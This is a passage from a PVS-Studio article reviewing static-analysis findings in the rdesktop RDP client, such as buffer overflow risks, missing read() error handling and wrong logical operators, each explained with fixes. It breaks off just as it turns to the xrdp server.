Perhaps retail is not their future, but they may move into more supporting roles and leave the ranks of the coders. Most of the rest will move to .NET. Myth #3: If you are going to move to .NET, you should move to C# C# currently has the celebrity aura. It’s new, it’s cool, and it’s hot. But other than having C-style syntax, it's essentially the same as Visual Basic .NET. Somehow this has yet to sink in. Here’s a conversation I recently had with a C++ developer who is making the transition to C#: Coder: “I can’t understand why anyone would learn Visual Basic .NET.” Me: “Why not?” Coder: “There are so many things it can’t do that C# can.” Me: “Really, like what?” Coder: “Well VB. NET can’t do attributes.” Me: “Sure it can." Coder: “Oh, it can. Well, can it do delegates?” Me: “Yes, it can do that as well.” The stigma still sticks. Dan Appleman does an excellent job of addressing this issue in Visual Basic .NET or C#...Which to Choose?, an e-book available from Amazon.com. Other than the lack of support for operator overloading and XML documentation, Visual Basic .NET has all the power of C#, plus some additional features like an always-on background compile that provides full real-time error detection that should make a C# developer envious. I submit the following alternative: Since Visual Basic .NET and C# are so similar, the decision can be made on nontechnical issues. Perception may still be a driving force in the job market, and C# is a brand-new arena for developers. Also, third-party tool support may become an issue if Visual Basic .NET gets the snub. C# may be the best choice for many Visual Basic developers, but not because of any inherent technical superiority. Getting down to the heart of the matter With those myths out of the way, we can examine further the ramifications .NET is going to have on the future of today’s Visual Basic developer. In subsequent columns I'll recount interviews with former Visual Basic developers and development teams that have made the transition to Java, Visual Basic .NET, or C#. I'll examine the cost of those transitions and what lessons can be learned to minimize the impact on development schedules and budgets. From VB 6.0 to VB .NET Are you all VB 6.0 fish in a .NET ocean? Drop us an e-mail or post a comment below.
http://www.techrepublic.com/article/where-will-the-visual-basic-60-developers-go/
CC-MAIN-2017-34
refinedweb
1,612
56.96
Open Source Your Knowledge, Become a Contributor Technology knowledge has to be shared and made accessible for free. Join the movement. Recursion One does not simply talk about functional programming without saying the word "recursion". The first question I asked myself is: Why use recursion? I was bad in mathematics, and I hated coming across recursion. But we can ask the question the other way around: Why should we use loops? Loops are the consequence of iterative design: we go from one step to another. In lower level languages, we have to define the number of steps we want to run without any real proof that this number is the right one. With recursive calls you can be sure that you will stop at the end, and you won't need to know the exact number of steps it will take. Whatever this number is you will perform your operations at each step and stop when your end condition is hit. However, as seen in the previous exercise, a high order function can use another function and by extension, itself. THerefore, recursion is a core feature of a pure functional language. Let's try a simple exercise to refresh our memory. Implement a method which returns a list filled with the x first elements of the Fibonacci sequence. With this first example, we keep every element in the stack to rebuild the full list at the end. We can do better by using tail recursion. Tail recursion is a way to build recursion where we don't need to keep each and every step in order to return the final result. The last thing you will do is call this function. The common way to do that is to use an accumulator. An example of tail rec: def factorial(n: Int): Int = { def iter(x: Int, result: Int): Int = if (x == 0) result else iter(x - 1, result * x) iter(n, 1) } Let's try to modify our Fibonacci sequence to be a tail recursion The Scala compiler optimizes tail recursion, so we should definitely use it. One last tip, the @tailrec annotation DOESN'T FORCE TAIL RECURSION. During compililation, it verifies that you are using tail recursion.
https://tech.io/playgrounds/270/functional-programming-explained-to-my-grandma/recursion
CC-MAIN-2018-17
refinedweb
368
63.39
Java Switch Case Statement With Simple Program Examples: Today, we are going to learn another new topic of Core Java tutorial series. That is Switch Case and if you are not reading our previous post about If-Else In Java then by using that link you can understand that. Switch Case statements used when there is several options are available, and we need to perform some specific task as per the selection. How to Use Switch Cases In Java the syntax for switch-case statements it looks like below: switch(variable) { case value1: statement1; case value2: statement2; case value3: statement3; . . . case valuen: statement; [default : default_statements;] } Java Switch Statement Example package java_Basics; public class SwitchCase_Example { public static void main(String[] args) { int i = 2; switch (i) { case 0: System.out.println("i is zero."); break; case 1: System.out.println("i is one."); break; case 2: System.out.println("i is two."); break; default: System.out.println("i is greater than 2."); } } } Output: i is two. Important Points Of Switch Statements - The case value cannot duplicate - The entered Value and the case Value must be the same data type. - The Value for Case must be literal or constant. you can not use the variable in case. - The Break statement is used inside the switch case to terminate the flow of statement sequence. - The Break statement is optional. If there is no break, then the flow of execution will continue to the next case. - The default statement in switch case is optional, and that can appear anywhere of the switch block. - Java Switch case statement make the code more readable by omitting if..else..if statements. - Make sure you are going to use Switch case string when you are going to use Java 7 otherwise you will get an exception. - You can use nested switch statements which means you can use a switch case statement inside another switch case. If You find anything wrong and if you want to add some more information then write in the comment section, and we are happy to update with your information.
https://www.softwaretestingo.com/java-switch-statement-case/
CC-MAIN-2020-10
refinedweb
346
66.03
eliminated all uses of "lit (abort") (s") (.") outside cross.fs, except one eliminated (c"); cliteral is now in the kernel. \ quote: S\" and .\" words \ Copyright (C). : char/ ; immediate : parse-num-x ( c-addr1 base -- c-addr2 c ) base ! 0. rot source chars + over - char/ >number drop rot rot drop ; : parse-num ( c-addr1 base -- c-addr2 c ) base @ >r ['] parse-num-x catch r> base ! throw ; create \-escape-table 7 c, 8 c, char c c, char d c, 27 c, 12 c, char g c, char h c, char i c, char j c, char k c, char l c, char m c, 10 c, char o c, char p c, char q c, 13 c, char s c, 9 c, char u c, 11 c, : \-escape ( c-addr1 -- c-addr2 c ) \ c-addr1 points at a char right after a '\', c-addr2 points right \ after the whole sequence, c is the translated char dup c@ dup [char] x = if drop char+ 16 parse-num exit endif dup [char] 0 [char] 8 within if drop 8 parse-num exit endif dup [char] n = if \ \-escapes were designed to translate to one character, so \ this is quite ugly: copy all but the last char right away drop newline 1- 2dup here swap chars dup allot move chars + c@ else dup [char] a [char] w within if [char] a - chars \-escape-table + c@ endif endif 1 chars under+ ; : \"-parse ( "string"<"> -- c-addr u ) \G parses string, translating @code{\}-escapes to characters (as in \G C). The resulting string resides at @code{here char+}. The \G supported @code{\-escapes} are: @code{\a} BEL (alert), @code{\b} \G BS, @code{\e} ESC (not in C99), @code{\f} FF, @code{\n} newline, \G @code{\r} CR, @code{\t} HT, @code{\v} VT, @code{\"} ", \G @code{\}[0-7]+ octal numerical character value, @code{\x}[0-9a-f]+ \G hex numerical character value; a @code{\} before any other \G character represents that character (only ', \, ? in C99). here >r >in @ chars source chars over + >r + begin ( parse-area R: here parse-end ) dup r@ < while dup c@ [char] " <> while dup c@ dup [char] \ = into \G single characters. See @code{\"-parse} for details. :noname \"-parse type ; :noname postpone s\" postpone type ; interpret/compile: .\" ( compilation 'ccc"' -- ; run-time -- ) \ gforth dot-backslash-quoteq\rs\tu\v" \-escape-table over str= 0= throw s\" \w\0101\x041\"\\" name wAA"\ str= 0= throw s\" s\\\" \\" ' evaluate catch 0= throw [endif]
http://www.complang.tuwien.ac.at/cvsweb/cgi-bin/cvsweb/gforth/quotes.fs?rev=1.6;content-type=text%2Fx-cvsweb-markup;hideattic=0;f=h;only_with_tag=MAIN
CC-MAIN-2019-30
refinedweb
408
68.84
Today I learned: resetting the Beam in Space Center (This is something I posted on Slack, but I figured it might be useful to cross-post here for others.) I can’t get my space center “Beam” to show up. This was a problem for me in 4.1 (but earlier as well, maybe) and now is still a problem in 4.2. @ryan helpfully responded with the following code, asking "what’s this output?": from lib.tools.defaults import getDefaultColor from lib.tools.misc import NSColorToRgba from mojo.UI import CurrentSpaceCenter beam_color = NSColorToRgba(getDefaultColor("spaceCenterBeamStrokeColor")) csc = CurrentSpaceCenter() print(beam_color) print(csc.beam()) csc.setBeam(500) Turns out, my beam was a visible color but set super high: (0.0, 0.0108, 0.9982, 1.0) 7856 And the setBeam()method fixed that. Thanks, Ryan! @frederik added to the conversation: makes me think, of an alt menu title for “Beam”: “Reset Beam” which restores the value to the original value (half of the height) ...which is an idea I like! I’m not sure what to tag this, but I guess Feature Requestmakes sense, as a feature might help others avoid this confusion in the future. After all, I literally went many months without a beam before asking for help, because I figured it was something that was just broken and might be fixed in a future update. 😅 Glad I finally asked, but a "Reset Beam" option could have helped on my most recent serif project!
https://forum.robofont.com/topic/1034/today-i-learned-resetting-the-beam-in-space-center/1
CC-MAIN-2022-27
refinedweb
246
64.81
Having spent a few days experimenting with setting up a build process for creating an Electron-based application thought I would put together a post describing the setup. First, a disclaimer that this is still a work in progress and as with everything within the JavaScript world it seems like there are a thousand ways to do it and this is just one way. Secondly, I am by no means an expert and this is just the process I wanted to create - I am sure there are improvements that can be made and would value suggestions! So my requirements are: - Want to use Electron for creating a simple (or not…) desktop application - Want to use TypeScript for the majority of the code - Where I have to use JavaScript code, want to have it linted by StandardJS - Want the TypeScript code to be linted by ts-lint but conforming to consistent rules with standardjs - Want to use WebPack (version 2) to control the build process - Want to use babel to transpile from ES6 to ES5 as needed for node, and to compile the JSX - Want to use React and tsxon the front end - Want to use the Jest unit testing framework - Want to have one place to control how TypeScript / TSX is linted and built, one place to control how JavaScript / JSX is linted and build and one place to run all the tests! Additional development environment goals: - Want to have a CI build process hosted within Visual Studio Team Services - Want to have the code hosted on GitHub - Be able to run the build and tests within Visual Studio Code The diagram below shows the end goal for the build process we are going to create. This guide is probably a bit too long (feels like my longest post in a while!), so if you prefer you can just download the initial project from github. Importing the packages… In this guide, I am using yarn but the same process will work with npm as well. Let’s start by creating an empty project by running and completing the wizard: yarn init Next, import all the packages we need for the build as development dependencies: For compiling and linting TypeScript (WebPack, TSLint, TypeScript) yarn add webpack tslint-config-standard tslint-loader ts-loader tslint typescript -D For transpiling and linting ES2015 code for Node (Babel, Babel Presets, StandardJS) yarn add babel-core babel-loader babel-preset-es2015-node babel-preset-react standard standard-loader -D Setting Up The Build Process In order to set this up, we need to set up a fair few pieces. Let’s start by getting the TypeScript process set up to build a file from the src directory to the dist folder. To configure the TypeScript compiler, add a new file called tsconfig.json to the root folder of the project with the following content: { "compileOnSave": false, "compilerOptions": { "target": "es2015", "moduleResolution": "node", "pretty": true, "newLine": "LF", "allowSyntheticDefaultImports": true, "strict": true, "noUnusedLocals": true, "noUnusedParameters": true, "sourceMap": true, "skipLibCheck": true, "allowJs": true, "jsx": "preserve" } } This tells the TypeScript compiler not to compile on save (as we are going to use WebPack) and to be strict (as this is a ‘greenfield’ project). Compiler Options: In order to set up tslint to be consistent with StandardJS, add another new file to the root directory called tslint.json with the following content: { "extends": "tslint-config-standard", "rules": { "indent": [true, "spaces"], "ter-indent": [true, 2], "space-before-function-paren": ["error", { "anonymous": "always", "named": "never", "asyncArrow": "ignore" }] } } This makes tslint follow the same configuration as StandardJS. I found the white-space settings were causing me some errors hence needing to add the additional configuration over tslint-config-standard. Next, configure WebPack to compile TypeScript files ( ts or tsx extensions) found in the src folder and output to the dist folder. The structure I use here is a little different from the standard as we will need two parallel configurations when we come to the Electron set up. Create a file called webpack.config.js and add the following: const path = require('path') const commonConfig = { output: { path: path.resolve(__dirname, 'dist'), filename: '[name].js' }, module: { rules: [ { test: /\.ts$/, enforce: 'pre', loader: 'tslint-loader', options: { typeCheck: true, emitErrors: true } }, { test: /\.tsx?$/, loader: 'ts-loader' } ] }, resolve: { extensions: ['.js', '.ts', '.tsx', '.jsx', '.json'] } } module.exports = Object.assign( { entry: { main: './src/main.ts' } }, commonConfig) The first rule tells WebPack to run tslint at the prebuild step, before then moving on run the TypeScript compiler. The resolve option adds the TypeScript extensions into WebPack so it will look for both JavaScript and TypeScript files (including JSX or TSX files). To add the build command to yarn or npm, add the following code to the packages.json. This is assuming you don’t have scripts section already if you do merge it in. "scripts": { "build": "webpack --config webpack.config.js" }, Visual Studio Code Set Up In order to run this build from within Visual Studio Code, the next step is to configure the task and also set up the workspace environment appropriately. Ctrl-Shift-B and then click Configure Build Task. Choose npm as a starting point, and then replace the default tasks array with: "tasks": [ { "taskName": "build", "args": ["run", "build"], "isBuildCommand": true } ] If using yarn, then change the command from npm to yarn. The last part of setting up the editor is to add a settings.json within the .vscode folder (which should have been created for the tasks.json file) specifying the number of spaces and line endings to match the linting settings: { "editor.tabSize": 2, "files.eol": "\n" } A restart of Visual Studio Code might be required in order for it to pick up these changes. Testing the build There are three ways to run the build (and all will do the same): - From within the root directory of the project, run yarn run build(or npm run build) - From within the root directory of the project, run .\node_modules\.bin\webpack Ctrl-Alt-Bwithin Visual Studio Code As there is no code yet, running the build will just result in an error: To test the build set up, create a src directory and add a main.ts file, with the following content (note the empty line at the end): export class SimpleClass { Add(a: number, b: number): number { return a + b } } const simpleClass: SimpleClass = new SimpleClass() console.log(simpleClass.Add(2, 3)) If all is working you should get output like: ts-loader: Using typescript@2.3.3 and D:\Repos\ToDosElectron\tsconfig.json Hash: c35650ba72c226225609 Version: webpack 2.6.1 Time: 3554ms Asset Size Chunks Chunk Names main.js 2.91 kB 0 [emitted] main [0] ./src/main.ts 73 bytes {0} [built] The dist folder should be created and a main.js file should exist. To test this, run node dist/main.js in the root folder. The output should be 5. Setting Up Babel Looking at the main.js file, the output is ES2015 style (this will be surrounded by a fair amount of WebPack boilerplate): class SimpleClass { Add(a, b) { return a + b; } } /* harmony export (immutable) */ __webpack_exports__["SimpleClass"] = SimpleClass; const simpleClass = new SimpleClass(); console.log(simpleClass.Add(2, 3)); The next goal is to use babel-js to convert from this to fully compatible JavaScript for Node. As of Babel 6, a .babelrc file is used to tell it what ‘presets’ to load. The following will tell it to understand both ES2015 and React, and to transpile down as needed for Node: { "presets": ["es2015-node", "react"] } WebPack also needs to be told to call Babel. The loader setting in each rule can take an array of loaders which are loaded in reverse order. Replacing loader: 'ts-loader' with loader: ['babel-loader', 'ts-loader'] makes WebPack run the TypeScript code through the TypeScript compiler and then the Babel compiler. After re-running the build the new main.js will be very similar to the last version, but should allow for all ES2015 features: class SimpleClass { Add(a, b) { return a + b; } } exports.SimpleClass = SimpleClass; const simpleClass = new SimpleClass(); console.log(simpleClass.Add(2, 3)); ... Having set up Babel for the second step in TypeScript build, need to also configure it for compiling JavaScript files. Additionally, StandardJS should be used as a linter for JavaScript files. To do this add the following 2 rules section of the webpack.config.js: { test: /\.js$/, enforce: 'pre', loader: 'standard-loader', options: { typeCheck: true, emitErrors: true } }, { test: /\.jsx?$/, loader: 'babel-loader' } If you also want to target browsers you could switch from es2015-node preset to the es2015 preset. Electron So far the process above doesn’t have any settings to deal with Electron. Electron adds a few additional complications we need to deal with. The following command will add the core Electron package and the type definitions for Electron and Node. It also adds the HTML WebPack plugin which I will use to generate a placeholder index.html for the UI side of Electron. yarn add electron html-webpack-plugin @types/electron @types/node -D An Electron application consists of two processes: - Main: This is a NodeJS based script which serves as the entry point into the application. It is responsible for instantiating the BrowserWindowsinstances and also manages various application lifecycle events - Renderer: This is a Chromium based browser. It is the User Interface part of the application. It has the same kind of structure you would expect if you use Chrome. One master process and each WebViewis its own process. The two process share some APIs and communicate between each other over using interprocess communication. There is a great amount of detail on this Electron’s process post. As we have two processes we are wanting to build output for we need to adjust the webpack.config.js file to handle this. For the two processes, there are two different target settings needed - electron-main and electron-renderer. If the configuration file exports an array then WebPack will interrupt each of the objects as parallel build processes. Replace the module.exports section of the configuration with: const HtmlWebpackPlugin = require('html-webpack-plugin') module.exports = [ Object.assign( { target: 'electron-main', entry: { main: './src/main.ts' } }, commonConfig), Object.assign( { target: 'electron-renderer', entry: { gui: './src/gui.ts' }, plugins: [new HtmlWebpackPlugin()] }, commonConfig) ] This will pick up the main.ts file and compile this as the Electron main process. It also will compile a gui.ts to be the Electron renderer process. The HtmlWebpackPlugin will create an index.html automatically that includes a reference to the compiled gui.js. WebPack also defaults to substituting the __dirname which is useful within Electron. This can be stopped by adding a setting to the commonConfig object: node: { __dirname: false }, Now to put together the main.ts script to create the Electron app and BrowserWindow: import { app, BrowserWindow } from 'electron' declare var __dirname: string let mainWindow: Electron.BrowserWindow function onReady() { mainWindow = new BrowserWindow({ width: 800, height: 600 }) const fileName = `{__dirname}/index.html` mainWindow.loadURL(fileName) mainWindow.on('close', () => app.quit()) } app.on('ready', () => onReady()) app.on('window-all-closed', () => app.quit()) console.log(`Electron Version ${app.getVersion()}`) For the UI side, a simple gui.ts writing the node version out to the document: document.getElementsByTagName('body')[0].innerHTML = `node Version: ${process.versions.node}` The last adjustment is to add a new task the packages.json file. The prestart entry makes it build it as well. "prestart": "yarn run build", "start": "electron ./dist/main.js", If you run yarn run start hopefully an electron window will appear with the node version displayed in it: Adding React In order to move to using TSX (or JSX), need to add React packages to the project: yarn add react react-dom yarn add @types/react @types/react-dom -D The entry point for the UI part of the application needs to be switched from gui.ts to gui.tsx. First, change the entry: { gui: './src/gui.ts' }, line in the webpack.config file to entry: { gui: './src/gui.tsx' }, and rename the file to gui.tsx. Replace the content in gui.tsx with: import React from 'react' import ReactDOM from 'react-dom' ReactDOM.render( <div>Node version: {process.versions.node}</div>, document.getElementsByTagName('body')[0]) Rerunning yarn run start will produce the same result as before but now we have an Electron-based application written in TypeScript using React and build with WebPack! Unit Tests The next piece to set up is a unit testing solution. Sticking with the rule that WebPack should build all the TypeScript, the idea is that the tests are written in TypeScript compiled from tests directory into another directory where Jest then runs the JavaScript output. Again the first step is to add the additional packages: yarn add jest jest-junit @types/jest -D WebPack needs another configuration file to run the tests. In general the settings should be the same between the two. By requiring the main webpack.config file, this test config file can use it as a starting point. Create a new config file called webpack.tests.config.js and add the following content: const webPack = require('./webpack.config') const fs = require('fs') const path = require('path') const readDirRecursiveSync = (folder, filter) => { const currentPath = fs.readdirSync(folder).map(f => path.join(folder, f)) const files = currentPath.filter(filter) const directories = currentPath .filter(f => fs.statSync(f).isDirectory()) .map(f => readDirRecursiveSync(f, filter)) .reduce((cur, next) => [...cur, ...next], []) return [...files, ...directories] } const getEntries = (folder) => readDirRecursiveSync(folder, f => f.match(/.*(tests|specs)\.tsx?$/)) .map((file) => { return { name: path.basename(file, path.extname(file)), path: path.resolve(file) } }) .reduce((memo, file) => { memo[file.name] = file.path return memo }, {}) module.exports = [ Object.assign({}, webPack[0], {entry: getEntries('./tests/host/')}), Object.assign({}, webPack[0], {entry: getEntries('./tests/gui/')}) ].map(s => { s.output.path = path.resolve(__dirname, '__tests__') return s }) The getEntries function is designed to search all folders within tests/host and tests/gui for TypeScript files with filenames ending either with tests or specs. This scan process limits the watch functionality of WebPack as it will only scan for files at start up. Files within tests/host will be built with the target setting of electron-main and tests/gui will be electron-renderer. The output will be built to a __tests__ folder and as before will pass through tslint, tsc and babel to produce JavaScript files. To add the test command to yarn, add the following to packages.json. The pretest stage will build all the test files before running jest on the result. "pretest": "webpack --config webpack.tests.config.js", "test": "jest" By default, Jest will search for the test files within the __tests__ folder or any JavaScript file with a filename ending either spec or test. Adding the configuration below (to package.json) limits Jests to just reading the __tests__ folder. The second part configures jest-junit to write out an XML file containing the test results - this is for Visual Studio Team Services to be able to read the results. "jest": { "testRegex": "/__tests__/.*\\.jsx?", "testResultsProcessor": "./node_modules/jest-junit" }, "jest-junit": { "suiteName": "jest tests", "output": "./TEST-jest_junit.xml", "classNameTemplate": "{classname}-{title}", "titleTemplate": "{classname}-{title}", "usePathForSuiteName": "true" } Finally, create the test directory structure and a couple of placeholder tests. Note the top line in the sample code below, this adds the global variables that Jest declares into TypeScript so the compiler will be happy! tests/host/host_tests.ts /// <reference types="jest" /> describe('Host', () => { test('PlaceHolderPassingTest', () => { expect(1 + 2).toBe(3) }) }) tests/gui/gui_tests.ts /// <reference types="jest" /> describe('GUI', () => { test('PlaceHolderFailingTest', () => { expect(1 + 2).toBe(4) }) }) Running yarn run test will build these two tests files and then run Jest on the resulting output: It will also create a TEST-jest_junit.xml file. This is for reading with Visual Studio Team Services so we get nice test results. Visual Studio Team Services Create a new project in Visual Studio Team Services and select build code from an external repository. New Definition and choose either of NodeJS scripts as a starting point. These are based on top of npm so it is easy to configure to build this project. I am sure you could make it use yarn but for simplicity have stuck with npm. First, reconfigure the Get Sources step to get the code from GitHub (you may need to allow pop-ups for the authorization step). It’s great how easy it is to integrate with external repositories now within VSTS. Next, remove the Run gulp task. Add a new npm task after the npm install, with npm command of run and argument of test. This will build and run the Jest tests. It needs to continue even if it the tests fail so choose Continue on error within the Control Options section. In order to make VSTS report the test results, add a new task to Publish Test Results. The default configuration of this task will pick up the JUnit format XML we have configured to be published in the npm test step. The last step is to run the actual WebPack build. So add another npm command. This time configured to run build. Finally, switch on the triggers for Continuous Integration and Pull Requests. That is it - a CI process from GitHub into VSTS! Future Improvements Since I started writing this Electron has updated with support for TypeScript. This doesn’t change much but does mean you don’t need type definitions for electron and node. If you have followed these instructions all you need do is run: yarn upgrade electron -D yarn remove @types/electron @types/node -D Currently, I don’t have a good solution for watching tests. While watch mode works fine for build (run yarn run build -- --watch) the test command set up doesn’t support watching yet. I’ll inevitably spend a fair chunk of time mucking around trying to get this bit set up as well but at present, I accept just having to run the command to run my tests. Primarily to keep this post shorter (well a little shorter), I haven’t gone into much detail on writing the Electron or React side of an application, instead just looking at the build process. I haven’t covered packaging or any of the other steps needed for Electron. Lots more I can add if people are interested. Hopefully, as I experiment and learn more, I will write a few more posts on Electron as it is a platform I am growing to really like. This post was also published on my own personal blog - jdunkerley.co.uk
https://blog.scottlogic.com/2017/06/06/typescript-electron-webpack.html
CC-MAIN-2021-21
refinedweb
3,093
55.74
Gain Remote Access to the Get-ExCommand Exchange Command Dr Scripto Summary: Learn how to gain access to the Get-ExCommand Exchange command while in an implicit remote Windows PowerShell session. Hey, Scripting Guy! I liked your idea about connecting remotely to Windows PowerShell on an Exchange Server. The problem is that I do not know all of the cmdlet names. When I am using RDP to connect to the Exchange server, there is a cmdlet named Get-ExCommand that I can use to find what I need. But when I use your technique of using Windows PowerShell remoting to connect to the Exchange Server, for some reason Get-ExCommand cmdlet does not work. Am I doing something wrong? Please help. —JM Microsoft Scripting Guy, Ed Wilson, is here. Well, it looks like my colleagues in Seattle are starting to dig out from the major snowstorm they received last week. Here in Charlotte, it has been sunny and cool. Of course, Seattle does not get a lot of 100 degrees Fahrenheit (37.7 degrees Celsius) days in the summer. Actually, the temperature is not what is so bad, but rather it is the humidity that is oppressive. A day that is 100 degrees Fahrenheit with 85% humidity makes a good day to spend in the pool, or to spend writing Windows PowerShell scripts whilst hugging an air conditioner. Back when I was traveling, the Scripting Wife and I usually ended up in Australia during our summer (and their winter)—it is our favorite way to escape the heat and the humidity. Thus, fall and winter in Charlotte is one of the reasons people move here—to escape the more rugged winters in the north. Anyway… Yesterday, I wrote a useful function that makes a remote connection to a server running Exchange Server 2010 and brings all of the Exchange commands into the current session. This function uses a technique called implicit remoting. It is unfortunate that the Get-ExCommand command is not available outside the native Exchange Server Management Shell, because the Exchange commands are not all that discoverable by using normal Windows PowerShell techniques. For example, I would expect to be able to find the commands via the Get-Command cmdlet, but as is shown here, nothing returns. PS C:\> Get-Command -Module *exchange* PS C:\> The Get-ExCommand cmdlet is actually a function and not a Windows PowerShell cmdlet. In reality, it does not make much of a difference that Get-ExCommand is not a cmdlet, except that with a function, I can easily use the Get-Content cmdlet to figure out what the command actually accomplishes. The function resides on the function drive in Windows PowerShell, and therefore the command to retrieve the content of the Get-ExCommand function looks like this: Get-Content Function:\Get-ExCommand The command and output associated with that command when run from within the Exchange Server Management Shell are shown in the image that follows. The following steps are needed to duplicate the Get-ExCommand function: - Open the Windows PowerShell ISE (or some other script editor). - Establish a remote session onto an Exchange Server. Use the New-ExchangeSession function from yesterday’s Hey, Scripting Guy! blog. - Make an RDP connection to a remote Exchange Server and use the Get-Content cmdlet to determine the syntax for the new Get-ExCommand command. - Use the Windows PowerShell ISE (or other script editor) to write a new function that contains the commands from Step 2 inside a new function named Get-ExCommand. In the image that follows, I run the New-ExchangeSession function and make an implicit remoting session to the server named “ex1,” which is running Exchange Server 2010. This step brings the Exchange commands into the current Windows PowerShell environment and provides commands with which to work when I am creating the new Get-ExCommand function. Here is a version of the Get-ExCommand function that retrieves all of the Microsoft Exchange commands. Function Get-ExCommand { Get-Command -Module $global:importresults | Where-Object { $_.commandtype -eq ‘function’ -AND $_.name -match ‘-‘} } #end function Get-ExCommand I copied the portion of the function that retrieves the module name from the $global namespace. It came from the contents of the Get-ExCommand function from the server running Exchange Server 2010. One of the nice things about functions is that they allow the code to be read. I added the Where-Object to filter out only the functions. In addition, I added the match clause to look for a “-“ in the function name. This portion arose because of the functions that set the working location to the various drive letters. To search for Exchange cmdlets that work with the database requires the following syntax. Get-ExCommand | where { $_.name –match ‘database’} That is not too bad, but if I need to type it on a regular basis, it rapidly becomes annoying. In the original Get-ExCommand function, the function uses the $args automatic variable to determine the presence of an argument to the function. When an argument exists, the function uses that and attempts to use the Get-Command cmdlet to retrieve a CmdletInfo object for the command in question. This is helpful because it allows the use of wildcards to discover applicable Windows PowerShell cmdlets for specific tasks. I decided to add a similar capability to my version of the Get-ExCommand function, but instead of using the $args variable, I created a command-line parameter named Name. To me, it makes the script easier to read. The following is the content of the Get-ExCommand function. Function Get-ExCommand { Param ([string]$name) If(!($name)) {Get-Command -Module $global:importresults | Where-Object { $_.commandtype -eq ‘function’ -AND $_.name -match ‘-‘} } Else {Get-Command -Module $global:importresults | Where-Object { $_.commandtype -eq ‘function’ -AND $_.name -match ‘-‘ -AND $_.name -match $name} } } #end function Get-ExCommand The first thing the Get-ExCommand function does is to create the $name parameter. Next, the if statement checks to see if the $name parameter exists on the command line. If it does not exist, the same syntax the previous version utilized appears. If the $name parameter does exist, an additional clause to match the value of the $name parameter appears. The following code illustrates searching for all Exchange commands related to the database. Get-ExCommand database The image that follows illustrates using the Get-ExCommand function, and the associated output. The complete Get-ExCommand function, including comment-based Help, appears in the Scripting Guys Script Repository. JM, that is all there is to gaining access to the Get-ExCommand command in a remote Windows PowerShell session. Join me tomorrow for more cool stuff. Until then, keep on
https://devblogs.microsoft.com/scripting/gain-remote-access-to-the-get-excommand-exchange-command/
CC-MAIN-2019-47
refinedweb
1,119
54.73
Checking rdesktop and xrdp with PVS-Studio This is the second post in our series of articles about the results of checking open-source software working with the RDP protocol. Today we are going to take a look at the rdesktop client and xrdp server. The analysis was performed by PVS-Studio. This is a static analyzer for code written in C, C++, C#, and Java, and it runs on Windows, Linux, and macOS. I will be discussing only those bugs that looked most interesting to me. On the other hand, since the projects are pretty small, there aren't many bugs in them anyway :). Note. The previous article about the check of FreeRDP is available here. rdesktop rdesktop is a free RDP client for UNIX-based systems. It can also run on Windows if built under Cygwin. rdesktop is released under GPLv3. This is a very popular client. It is used as a default client on ReactOS, and you can also find third-party graphical front-ends to go with it. The project is pretty old, though: it was released for the first time on April 4, 2001, and is 17 years old, as of this writing. As I already said, the project is very small — about 30 KLOC, which is a bit strange considering its age. Compare that with FreeRDP with its 320 KLOC. Here's Cloc's output: Unreachable code V779 Unreachable code detected. It is possible that an error is present. rdesktop.c 1502 int main(int argc, char *argv[]) { .... return handle_disconnect_reason(deactivated, ext_disc_reason); if (g_redirect_username) xfree(g_redirect_username); xfree(g_username); } The first error is found immediately in the main function: the code following the return statement was meant to free the memory allocated earlier. But this defect isn't dangerous because all previously allocated memory will be freed by the operating system once the program terminates. No error handling V557 Array underrun is possible. The value of 'n' index could reach -1. rdesktop.c 1872 RD_BOOL subprocess(char *const argv[], str_handle_lines_t linehandler, void *data) { int n = 1; char output[256]; .... while (n > 0) { n = read(fd[0], output, 255); output[n] = '\0'; // <= str_handle_lines(output, &rest, linehandler, data); } .... } The file contents are read into the buffer until EOF is reached. At the same time, this code lacks an error handling mechanism, and if something goes wrong, read will return -1 and execution will start reading beyond the bounds of the output array. Using EOF in char V739 EOF should not be compared with a value of the 'char' type. The '(c = fgetc(fp))' should be of the 'int' type. ctrl.c 500 int ctrl_send_command(const char *cmd, const char *arg) { char result[CTRL_RESULT_SIZE], c, *escaped; .... while ((c = fgetc(fp)) != EOF && index < CTRL_RESULT_SIZE && c != '\n') { result[index] = c; index++; } .... } This code implements incorrect EOF handling: if fgetc returns a character whose code is 0xFF, it will be interpreted as the end of file (EOF). EOF is a constant typically defined as -1. For example, in the CP1251 encoding, the last letter of the Russian alphabet is encoded as 0xFF, which corresponds to the number -1 in type char. It means that the 0xFF character, just like EOF (-1), will be interpreted as the end of file. To avoid errors like that, the result returned by the fgetc function should be stored in a variable of type int. Typos Snippet 1 V547 Expression 'write_time' is always false. disk.c 805 RD_NTSTATUS disk_set_information(....) { time_t write_time, change_time, access_time, mod_time; .... if (write_time || change_time) mod_time = MIN(write_time, change_time); else mod_time = write_time ? write_time : change_time; // <= .... } The author of this code must have accidentally used the || operator instead of && in the condition. Let's see what values the variables write_time and change_time can have: - Both variables have 0. In this case, execution moves on to the else branch: the mod_time variable will always be evaluated to 0 no matter what the next condition is. - One of the variables has 0. In this case, mod_time will be assigned 0 (given that the other variable has a non-negative value) since MIN will choose the least of the two. - Neither variable has 0: the minimum value is chosen. Changing that line to write_time && change_time will fix the behavior: - Only one or neither variable has 0: the non-zero value is chosen. - Neither variable has 0: the minimum value is chosen. Snippet 2 V547 Expression is always true. Probably the '&&' operator should be used here. disk.c 1419 static RD_NTSTATUS disk_device_control(RD_NTHANDLE handle, uint32 request, STREAM in, STREAM out) { .... if (((request >> 16) != 20) || ((request >> 16) != 9)) return RD_STATUS_INVALID_PARAMETER; .... } Again, it looks like the problem of using the wrong operator — either || instead of && or == instead of != because the variable can't store the values 20 and 9 at the same time. Unlimited string copying V512 A call of the 'sprintf' function will lead to overflow of the buffer 'fullpath'. disk.c 1257 RD_NTSTATUS disk_query_directory(....) { .... char *dirname, fullpath[PATH_MAX]; .... /* Get information for directory entry */ sprintf(fullpath, "%s/%s", dirname, pdirent->d_name); .... } If you could follow the function to the end, you'd see that the code is OK, but it may get broken one day: just one careless change will end up with a buffer overflow since sprintf is not limited in any way, so concatenating the paths could take execution beyond the array bounds. We recommend replacing this call with snprintf(fullpath, PATH_MAX, ....). Redundant condition V560 A part of conditional expression is always true: add > 0. scard.c 507 static void inRepos(STREAM in, unsigned int read) { SERVER_DWORD add = 4 - read % 4; if (add < 4 && add > 0) { .... } } The add > 0 check doesn't make any difference as the variable will always be greater than zero because read % 4 returns the remainder, which will never be equal to 4. xrdp xrdp is an open-source RDP server. The project consists of two parts: - xrdp — the protocol implementation. It is released under Apache 2.0. - xorgxrdp — 